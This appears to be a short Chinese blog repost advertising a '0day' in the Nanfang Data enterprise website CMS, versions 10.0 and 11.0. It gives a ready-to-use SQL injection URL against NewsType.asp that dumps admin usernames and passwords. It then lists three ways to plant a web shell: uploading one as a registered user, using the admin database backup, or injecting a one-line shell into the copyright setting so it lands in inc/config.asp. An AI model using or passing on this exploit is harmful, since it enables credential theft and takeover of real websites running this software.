南方数据企业0day漏洞(影响版本: v10.0 v11.0)
程序员文章站
2022-07-01 20:37:42
Qglfnts Blog
影响版本: v10.0 v11.0asp?SmallClass=%20union%20select%200,username%2BCHR(124)%2Bpasswo...
影响版本: v10.0 v11.0
asp?SmallClass=%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20=" target=_blank>http://www.xxx.com/NewsType.asp?SmallClass=%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20=
直接爆用户密码。
拿shell方法貌似有3种
1、注册用户上传拿shell,这个比较直接,可以不进后台和在不知道用户名密码的情况下。
2、进后台备份数据库
3、在网站配置的版权信息里插入一句话,一句话地址写入到 http://www.xxx.com/inc/config.asp